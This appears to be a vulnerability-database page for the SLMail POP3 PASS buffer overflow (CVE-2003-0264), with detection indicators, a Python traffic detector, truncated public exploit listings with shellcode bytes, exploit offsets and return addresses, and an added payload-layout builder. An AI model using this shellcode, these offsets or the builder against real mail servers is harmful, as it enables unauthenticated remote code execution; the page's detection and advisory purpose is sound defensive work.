CVE-2003-0264
Published 2003-05-27
Priority: P3 · 52 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Public exploit available
EPSS: 71.48% (99.3rd percentile)
Multiple buffer overflows in SLMail 5.1.0.4420 allow remote attackers to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN argument to slmail.exe, (3) a long string to POPPASSWD, or (4) a long password to the POP3 server.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| seattle_lab_software | slmail | — | — |
Detection & IOCs
Indicator bytes (shellcode prefixes seen in the public PoCs):
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2
\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45
- Detect oversized PASS commands on POP3 port 110: the saved return address is overwritten 2606 or 4654 bytes into the buffer, so any PASS argument longer than about 2600 bytes is far beyond a legitimate password and should be treated as an exploit attempt.
- Monitor POP3 (port 110) for PASS commands made up of long runs of 0x41 ('A') padding followed by a return address and a NOP sled (0x90 bytes); this layout is characteristic of the public stack-overflow exploits.
- Alert on POP3 PASS commands whose argument exceeds 2600 bytes; the overflow is unauthenticated and triggers before any credential check.
- After exploitation, POP3 port 110 is unusable until the slmail.exe service is restarted: monitor for sudden POP3 unavailability following a large PASS request.
- Detect the shellcode byte sequence FC 6A EB 4D E8 F9 FF FF FF 60 8B 6C 24 24 8B 45 at the start of the payload (the bind/reverse shell loader shared by several of the public exploits for this CVE).
- Monitor for new inbound connections to port 4444 on the SLMail host (the bind-shell port used by the public PoCs) and for unexpected outbound connections from that host (the reverse-shell variant) following a large POP3 PASS request.
- The Metasploit module checks the POP3 banner against /^\+OK POP3 server (.*) ready/ before firing; a banner that no longer matches may indicate a crashed or already exploited service.
Notes:
- The return address 0x5f4a358f (in SLMFC.DLL) works across all Windows versions and service packs tested; defenders should not assume the exploit is limited to a specific OS version.
- Versions of SLMail older than 5.5 may also be vulnerable to the same exploit; testing was not performed on them.
- Null bytes (0x00), newlines (0x0a, 0x0d) and spaces (0x20) are bad characters that cannot appear in the payload; shellcode must be encoded to avoid them.
- SLMFC.DLL's last modification date is 06/02/99, suggesting the vulnerable code path has been unchanged for years and that the DLL is a stable gadget source.
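The indicators above, turned into detection logic. This is an added example, not code from any of the exploits or tools listed on this page; the sample POP3 session is constructed, and the 256-byte padding-run threshold and the helper names are this example's own choices. It splits a client-to-server POP3 stream on CRLF (the public exploits cannot contain 0x0a/0x0d, so the whole PASS argument stays on one line) and flags any PASS argument that is oversized, shows the 'A' padding plus NOP sled layout, or carries the shellcode prefix shared by the PoCs.

```python
"""POP3 PASS overflow detector for CVE-2003-0264 (added example)."""
import re

PASS_LENGTH_THRESHOLD = 2600                  # both known EIP offsets (2606, 4654) exceed this
NOP_SLED = b"\x90" * 8                        # minimum run of NOPs we treat as a sled
PADDING_RUN = re.compile(rb"\x41{256,}")      # run of 'A' padding; 256 is an assumed threshold
# 16-byte loader prefix shared by the Exploit-DB (2)/(3) PoCs, copied from the IOC list above
PAYLOAD_PREFIX = bytes.fromhex("fc6aeb4de8f9ffffff608b6c24248b45")


def analyze_pass_arg(arg: bytes) -> list[str]:
    """Return a list of human-readable findings for one PASS argument (empty if benign)."""
    findings = []
    if len(arg) > PASS_LENGTH_THRESHOLD:
        findings.append(f"oversized PASS argument ({len(arg)} bytes)")
    m = PADDING_RUN.search(arg)
    if m and NOP_SLED in arg[m.end():]:
        findings.append("0x41 padding followed by NOP sled")
    if PAYLOAD_PREFIX in arg:
        findings.append("known shellcode prefix")
    return findings


def scan_pop3_stream(data: bytes) -> list[dict]:
    """Scan client->server POP3 bytes; one alert record per suspicious PASS command."""
    alerts = []
    for lineno, line in enumerate(data.split(b"\r\n"), 1):
        if line[:5].upper() != b"PASS ":       # POP3 commands are case-insensitive
            continue
        arg = line[5:]
        findings = analyze_pass_arg(arg)
        if findings:
            alerts.append({"line": lineno, "length": len(arg), "findings": findings})
    return alerts


# Constructed sample traffic: a normal login, then a session shaped like the public exploit
BENIGN_SESSION = b"USER alice\r\nPASS s3cret\r\nSTAT\r\nQUIT\r\n"
EXPLOIT_LIKE_SESSION = (
    b"USER test\r\nPASS "
    + b"A" * 2606                      # padding up to the saved return address
    + b"\x8f\x35\x4a\x5f"              # 0x5f4a358f (SLMFC.DLL) little-endian, as in the IOC notes
    + b"\x90" * 16                     # NOP sled
    + PAYLOAD_PREFIX                   # start of the shared shellcode loader
    + b"\r\n"
)

if __name__ == "__main__":
    print("benign:", scan_pop3_stream(BENIGN_SESSION))
    print("exploit-like:", scan_pop3_stream(EXPLOIT_LIKE_SESSION))
```

The length check alone catches both known offsets; the padding/sled and prefix checks are there so that a hit on a shorter, encoded payload still carries more than one indicator for triage.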
No detection rules found.
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
---
##
# $Id: seattlelab_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
'Description' => %q{
There exists an unauthenticated buffer overflow vulnerability
in the POP3 server of Seattle Lab Mail 5.5 when sending a password
with excessive length.
Successful exploitation should not crash either the
service or the server; however, after initial use the
port cannot be reused for s
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)
exploitdb·2004-12-22
---
/*
SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov "Ivan the Fool"
"Invalid" 31337 Team
*/
#include
#include
#include
#include
// [*] bind 4444
unsigned char shellcode[] =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\x
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
exploitdb·2004-12-21
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
#define port 110
/* revshell - Iraq Hackers Group */
char shellcode[] =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)
exploitdb·2004-11-18
---
#########################################################
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# www.offsec.com #
# Plain vanilla stack overflow in the PASS command #
# #
#########################################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
#########################################################
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
#########################################################
import struct
import socket
print "\n\n######################
Metasploit
Seattle Lab Mail 5.5 POP3 Buffer Overflow
metasploit
There exists an unauthenticated buffer overflow vulnerability in the POP3 server of Seattle Lab Mail 5.5 when sending a password with excessive length. Successful exploitation should not crash either the service or the server; however, after initial use the port cannot be reused for successive exploitation until the service has been restarted. Consider using a command execution payload following the bind shell to restart the service if you need to reuse the same port. The overflow appears to occur in the debugging/error reporting section of the slmail.exe executable, and there are multiple offsets that will lead to successful exploitation. This exploit uses 2606, the offset that creates the smallest overall payload. The other offset is 4654. The r
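The offsets in the module description above and the bad-character list in the IOC notes fix the shape of a working PASS argument: padding up to the saved return address, the SLMFC.DLL address, a NOP sled, then shellcode with no 0x00, 0x0a, 0x0d or 0x20 bytes. The following is an added example, not code from the Metasploit module or the Exploit-DB PoCs; it lays out that structure, audits it for bad characters, and shows that the raw shellcode shipped with the C PoCs (2) and (3) on this page contains a 0x20 byte and so would need encoding to satisfy the Metasploit bad-character list. The 0xCC stand-in payload and the function names are this example's own.

```python
"""Payload layout and bad-character audit for CVE-2003-0264 (added example)."""
import struct

BAD_CHARS = b"\x00\x0a\x0d\x20"     # from the IOC notes above
EIP_OFFSETS = (2606, 4654)          # both reach the saved return address; 2606 gives the smaller payload
RET_ADDR = 0x5F4A358F               # SLMFC.DLL address used by the public exploits

# First 32 bytes of the raw (unencoded) shellcode from the Exploit-DB (2)/(3) listings above
POC_SHELLCODE_HEAD = bytes.fromhex(
    "fc6aeb4de8f9ffffff608b6c24248b45"
    "3c8b7c057801ef8b4f188b5f2001eb49"
)

# Constructed stand-in for an encoded payload: int3 bytes, chosen only because none is a bad char
CLEAN_STUB = b"\xcc" * 8


def find_bad_chars(blob: bytes, bad: bytes = BAD_CHARS) -> list[tuple[int, int]]:
    """Return (offset, value) for every bad byte in blob, in order of appearance."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def build_pass_argument(shellcode: bytes, offset: int = 2606, sled: int = 16) -> bytes:
    """Lay out padding | return address | NOP sled | shellcode, refusing any bad character."""
    if offset not in EIP_OFFSETS:
        raise ValueError(f"offset {offset} is not one of the known EIP offsets {EIP_OFFSETS}")
    arg = b"A" * offset + struct.pack("<I", RET_ADDR) + b"\x90" * sled + shellcode
    bad = find_bad_chars(arg)
    if bad:
        raise ValueError(f"payload contains bad characters at {bad}")
    return arg


def layout(arg: bytes, offset: int = 2606) -> dict:
    """Describe where each region of a PASS argument lands, for review or triage."""
    ret = struct.unpack("<I", arg[offset:offset + 4])[0]
    rest = arg[offset + 4:]
    sled_len = len(rest) - len(rest.lstrip(b"\x90"))
    return {
        "total_len": len(arg),
        "padding": offset,
        "ret_addr": ret,
        "nop_sled": sled_len,
        "shellcode_len": len(rest) - sled_len,
    }


if __name__ == "__main__":
    print("bad bytes in raw PoC shellcode head:", find_bad_chars(POC_SHELLCODE_HEAD))
    print(layout(build_pass_argument(CLEAN_STUB)))
```

Running the audit on the PoC shellcode reports the 0x20 at offset 28 (the `\x8b\x5f\x20` sequence visible in the listings); running it on the 0x5f4a358f return address and the 0x41/0x90 filler reports nothing, which is why those bytes can be sent verbatim.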
References
http://marc.info/?l=bugtraq&m=105232506011335&w=2
http://marc.info/?l=ntbugtraq&m=105233360321895&w=2
http://packetstormsecurity.com/files/161526/SLMail-5.1.0.4420-Remote-Code-Execution.html
http://www.nextgenss.com/advisories/slmail-vulns.txt
Published 2003-05-27